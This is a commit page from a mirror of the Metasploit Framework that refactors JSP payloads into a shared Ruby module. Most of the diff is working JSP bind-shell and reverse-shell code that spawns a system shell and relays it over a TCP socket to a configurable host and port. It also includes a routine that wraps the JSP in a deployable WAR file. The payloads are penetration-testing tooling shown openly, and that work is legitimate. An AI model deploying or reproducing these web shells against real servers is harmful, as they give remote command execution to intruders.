infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Refactor JSP payloads

bug/bundler_fix
jvazquez-r7 2013-12-31 08:27:37 -06:00
parent aa38a23921
commit 0725b9c69c
4 changed files with 159 additions and 171 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
lib/msf/core/payload.rb
View File

@ -29,6 +29,7 @@ class Payload < Msf::Module
require 'msf/core/payload/netware' require 'msf/core/payload/netware'
require 'msf/core/payload/java' require 'msf/core/payload/java'
require 'msf/core/payload/dalvik' require 'msf/core/payload/dalvik'
require 'msf/payload/jsp'
## ##
# #

154
lib/msf/payload/jsp.rb Normal file
View File

@ -0,0 +1,154 @@
# -*- coding: binary -*-
require 'msf/core'
require 'rex'
module Msf::Payload::JSP
# Outputs jsp that spawns a bind TCP shell
# @return [String] jsp code that executes bind TCP payload
def jsp_bind_tcp
# Modified from: http://www.security.org.sg/code/jspreverse.html
jsp = <<-EOS
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader in = null;
BufferedWriter out = null;
try
{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
try
{
ServerSocket server_socket = new ServerSocket( #{datastore['LPORT'].to_s} );
Socket client_socket = server_socket.accept();
server_socket.close();
Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" );
( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
EOS
return jsp.gsub(/^\s{6}/, '')
end
# Outputs jsp code that spawns a reverse TCP shell
# @return [String] jsp code that executes reverse TCP payload
def jsp_reverse_tcp
# JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
jsp = <<-EOS
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader in = null;
BufferedWriter out = null;
try
{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
try
{
Socket socket = new Socket( "#{datastore['LHOST']}", #{datastore['LPORT'].to_s} );
Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
EOS
return jsp.gsub(/^\s{6}/, '')
end
# Wraps the jsp payload into a war
# @return [Rex::Zip::Jar] a war to execute the jsp payload
def generate_war
jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp"
zip = Rex::Zip::Jar.new
web_xml = <<-EOF
<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<welcome-file-list>
<welcome-file>#{jsp_name}</welcome-file>
</welcome-file-list>
</web-app>
EOF
zip.add_file("WEB-INF/", '')
zip.add_file("WEB-INF/web.xml", web_xml)
zip.add_file(jsp_name, generate)
zip
end
end

88
modules/payloads/singles/java/jsp_shell_bind_tcp.rb
View File

@ -12,6 +12,7 @@ require 'rex'
module Metasploit3 module Metasploit3
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::JSP
include Msf::Sessions::CommandShellOptions include Msf::Sessions::CommandShellOptions
def initialize(info = {}) def initialize(info = {})
@ -35,92 +36,7 @@ module Metasploit3
def generate def generate
# Modified from: http://www.security.org.sg/code/jspreverse.html return super + jsp_bind_tcp
jsp = %q{
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader in = null;
BufferedWriter out = null;
try
{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
try
{
ServerSocket server_socket = new ServerSocket( LPORT );
Socket client_socket = server_socket.accept();
server_socket.close();
Process process = Runtime.getRuntime().exec( "SHELL" );
( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
}
jsp = jsp.gsub( "LPORT", datastore['LPORT'].to_s )
jsp = jsp.gsub( "SHELL", datastore['SHELL'] )
return super + jsp
end
def generate_war
jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp"
zip = Rex::Zip::Jar.new
web_xml = <<-EOF
<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<welcome-file-list>
<welcome-file>#{jsp_name}</welcome-file>
</welcome-file-list>
</web-app>
EOF
zip.add_file("WEB-INF/", '')
zip.add_file("WEB-INF/web.xml", web_xml)
zip.add_file(jsp_name, generate)
zip
end end
end end

87
modules/payloads/singles/java/jsp_shell_reverse_tcp.rb
View File

@ -11,6 +11,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3 module Metasploit3
include Msf::Payload::Single include Msf::Payload::Single
include Msf::Payload::JSP
include Msf::Sessions::CommandShellOptions include Msf::Sessions::CommandShellOptions
def initialize(info = {}) def initialize(info = {})
@ -34,96 +35,12 @@ module Metasploit3
def generate def generate
# JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
jsp = %q{
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader in = null;
BufferedWriter out = null;
try
{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
try
{
Socket socket = new Socket( "LHOST", LPORT );
Process process = Runtime.getRuntime().exec( "SHELL" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
}
if( !datastore['LHOST'] or datastore['LHOST'].empty? ) if( !datastore['LHOST'] or datastore['LHOST'].empty? )
return super return super
end end
jsp = jsp.gsub( "LHOST", datastore['LHOST'] ) return super + jsp_reverse_tcp
jsp = jsp.gsub( "LPORT", datastore['LPORT'].to_s )
jsp = jsp.gsub( "SHELL", datastore['SHELL'] )
return super + jsp
end
def generate_war
jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp"
zip = Rex::Zip::Jar.new
web_xml = <<-EOF
<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<welcome-file-list>
<welcome-file>#{jsp_name}</welcome-file>
</welcome-file-list>
</web-app>
EOF
zip.add_file("WEB-INF/", '')
zip.add_file("WEB-INF/web.xml", web_xml)
zip.add_file(jsp_name, generate)
zip
end end
end end